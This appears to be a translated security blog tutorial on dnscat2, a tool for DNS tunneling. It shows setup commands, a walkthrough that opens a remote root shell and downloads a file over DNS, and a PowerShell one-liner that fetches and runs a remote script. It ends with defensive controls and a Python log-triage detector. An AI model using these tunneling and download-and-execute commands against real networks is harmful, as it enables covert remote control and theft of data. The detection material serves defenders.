DNScat2: Using DNS Tunneling to Bypass Firewalls

0x01 Overview

Outbound traffic at an internal network's egress is usually tightly restricted, but DNS requests (UDP port 53) are normally left open. dnscat2 is a tool that uses the DNS protocol to build an encrypted C&C channel for remotely controlling a host. It consists of two parts: a client and a server.

When the client runs, a domain name must be specified. All requests are sent to the local DNS server, which forwards them to the authoritative DNS server for that domain.

If you do not have an authoritative DNS server, you can also connect directly to the server on UDP port 53. This is faster and still looks like ordinary DNS queries, but in the request logs every domain name begins with dnscat. This mode is frequently blocked by firewalls.

The server must run on the authoritative DNS server and, like the client, needs the domain name specified.

0x02 Deployment

Client

$ git clone https://github.com/iagox86/dnscat2.git
$ cd dnscat2/client/
$ make

Server

yum install rubygems
gem install bundler
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server
bundle install

0x03 Usage

If the target network lets all DNS requests out, you can specify the HOST directly and communicate over UDP port 53.

If the target network only allows communication with trusted DNS servers, you need to register a domain name and point its authoritative DNS server at the host running the dnscat2 server. Here we take the first case as the example:

On the server, run ruby ./dnscat2.rb

root@kali:/tmp/dnscat2/server# ruby ./dnscat2.rb

New window created: 0
New window created: crypto-debug
dnscat2> Welcome to dnscat2! Some documentation may be out of date.

auto_attach => false
history_size (for new windows) => 1000
Security policy changed: All connections must be encrypted
New window created: dns1
Starting Dnscat2 DNS server on 0.0.0.0:53
[domains = n/a]...

It looks like you didn't give me any domains to recognize!
That's cool, though, you can still use direct queries,
although those are less stealthy.

To talk directly to the server without a domain name, run:

  ./dnscat --dns server=x.x.x.x,port=53 --secret=eca54e475210239dc87a7c9f2516c89a

Of course, you have to figure out <server> yourself! Clients
will connect directly on UDP port 53.

On the client, run:

[root@vincenthostname client]# ./dnscat --dns server=172.16.100.182,port=53 --secret=eca54e475210239dc87a7c9f2516c89a
Creating DNS driver:
 domain = (null)
 host   = 0.0.0.0
 port   = 53
 type   = TXT,CNAME,MX
 server = 172.16.100.182

** Peer verified with pre-shared secret!

Session established!

The server then shows the connection being established:

New window created: 1
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
dnscat2> session -i 1
New window created: 1
history_size (session) => 1000
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a command session!

That means you can enter a dnscat2 command such as
'ping'! For a full list of clients, try 'help'.

List the supported commands:

command (vincenthostname) 1> help

Here is a list of commands (use -h on any of them for additional help):
* clear
* delay
* download
* echo
* exec
* help
* listen
* ping
* quit
* set
* shell
* shutdown
* suspend
* tunnels
* unset
* upload
* window
* windows

Shell session

command (vincenthostname) 1> shell
Sent request to execute a shell
command (vincenthostname) 1> New window created: 2
Shell session created!

command (vincenthostname) 1> session -i 2
New window created: 2
history_size (session) => 1000
Session 2 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a console session!

That means that anything you type will be sent as-is to the
client, and anything they type will be displayed as-is on the
screen! If the client is executing a command and you don't
see a prompt, try typing 'pwd' or something!

To go back, type ctrl-z.

sh (vincenthostname) 2> whoami
sh (vincenthostname) 2> root
sh (vincenthostname) 2> cat /etc/issue
sh (vincenthostname) 2> CentOS release 6.5 (Final)
Kernel \r on an \m

Downloading a file

command (vincenthostname) 1> download /tmp/1.sh
Attempting to download /tmp/1.sh to 1.sh
command (vincenthostname) 1> Wrote 51 bytes from /tmp/1.sh to 1.sh!
root@kali:/tmp/dnscat2/server# ls 1.sh
1.sh

The communication packets look like this:

As you can see, the domain names begin with dnscat.

0x04 Communicating with the PowerShell Client

Server

ruby ./dnscat2.rb --dns "domain=test,host=172.16.100.182" --no-cache

Client

Download: https://github.com/lukebaggett/dnscat2-powershell/blob/master/dnscat2.ps1

Run in PowerShell:

IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/master/dnscat2.ps1')
Start-Dnscat2 -Domain test -DNSServer 172.16.100.182

0x05 Defense

1) On the firewall, only allow communication with trusted DNS servers.

2) As noted above, the default dnscat queries contain the string dnscat, which can serve as a signature for firewall and intrusion detection rules.

3) Log DNS queries and monitor the logs for anomalies in frequency, length and query type.
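The three controls above, together with the observation in section 0x03 that the default query names begin with dnscat, can be exercised against DNS query logs. The script below is an added example written for this post; it is not code from the original article or from the dnscat2 project. The log line format, the trusted-resolver list, the length and rate thresholds and the sample log lines are all constructed assumptions to be tuned per network. It flags queries sent to a resolver other than the trusted one (control 1), queries whose first label is dnscat (control 2), and long names, the TXT/CNAME/MX record types the client printed above, and clients sending bursts of queries (control 3).

```python
import re
from collections import defaultdict

# Constructed sample log (not real traffic), one query per line:
# "<unix_ts> <client_ip> <resolver_ip> <qtype> <qname>"
SAMPLE_LOG = """\
1700000000 10.0.0.5 172.16.100.182 TXT dnscat.3a2f9c1b4d5e6f7081122334.example
1700000000 10.0.0.5 172.16.100.182 CNAME dnscat.9f8e7d6c5b4a392817161514.example
1700000000 10.0.0.5 172.16.100.182 MX dnscat.0011223344556677889900aa.example
1700000001 10.0.0.5 172.16.100.182 TXT dnscat.ffeeddccbbaa998877665544.example
1700000001 10.0.0.7 10.0.0.53 A www.example.com
1700000002 10.0.0.7 10.0.0.53 AAAA mail.example.com
1700000002 10.0.0.9 10.0.0.53 TXT 4f3a9c1b2d5e6f70811223344556677889900aabbccddeeff00112233.tunnel.test
1700000003 10.0.0.7 10.0.0.53 A cdn.example.com
"""

# Assumed policy values (not from the post): the resolver the firewall
# should allow, the record types the dnscat client reported
# ("type = TXT,CNAME,MX"), and length / rate thresholds to tune per network.
TRUSTED_RESOLVERS = {"10.0.0.53"}
TUNNEL_QTYPES = {"TXT", "CNAME", "MX"}
MAX_LABEL_LEN = 32
MAX_NAME_LEN = 52
RATE_WINDOW_SECONDS = 1
RATE_THRESHOLD = 3

LINE_RE = re.compile(r"^(\d+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)$")


def parse_line(line):
    """Parse one log line into a dict, or return None for malformed lines."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, client, resolver, qtype, qname = m.groups()
    return {"ts": int(ts), "client": client, "resolver": resolver,
            "qtype": qtype.upper(), "qname": qname.rstrip(".").lower()}


def classify_query(q):
    """Return the list of indicators a single query triggers."""
    reasons = []
    labels = q["qname"].split(".")
    if q["resolver"] not in TRUSTED_RESOLVERS:
        reasons.append("untrusted_resolver")      # control 1
    if labels[0] == "dnscat":
        reasons.append("dnscat_signature")        # control 2: default name prefix
    if len(q["qname"]) > MAX_NAME_LEN or max(len(l) for l in labels) > MAX_LABEL_LEN:
        reasons.append("long_name")               # control 3: length
    # Record type alone is weak evidence (mail servers issue MX lookups),
    # so it only corroborates another indicator.
    if q["qtype"] in TUNNEL_QTYPES and reasons:
        reasons.append("tunnel_qtype")            # control 3: type
    return reasons


def rate_alerts(queries):
    """Clients exceeding RATE_THRESHOLD queries in one window (control 3: frequency)."""
    buckets = defaultdict(int)
    for q in queries:
        buckets[(q["client"], q["ts"] // RATE_WINDOW_SECONDS)] += 1
    return sorted({client for (client, _), n in buckets.items() if n >= RATE_THRESHOLD})


def triage(log_text):
    """Run all checks over a log; return flagged queries plus per-client rate alerts."""
    queries = [q for q in map(parse_line, log_text.splitlines()) if q]
    findings = [dict(q, reasons=classify_query(q)) for q in queries]
    return {
        "flagged": [f for f in findings if f["reasons"]],
        "rate_alerts": rate_alerts(queries),
    }


if __name__ == "__main__":
    result = triage(SAMPLE_LOG)
    for f in result["flagged"]:
        print(f["client"], f["qtype"], f["qname"], ",".join(f["reasons"]))
    print("rate alerts:", result["rate_alerts"])
```

On the sample log the four dnscat queries are flagged by both the resolver check and the name signature, the long TXT query to tunnel.test is flagged by length and type even though it carries no dnscat prefix, and 10.0.0.5 trips the rate alert for sending three queries in the same second. In practice, feed the script resolver or firewall logs, and raise the thresholds until ordinary lookups stop producing noise before treating a hit as an incident.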

 

Reference:

https://www.anquanke.com/post/id/85764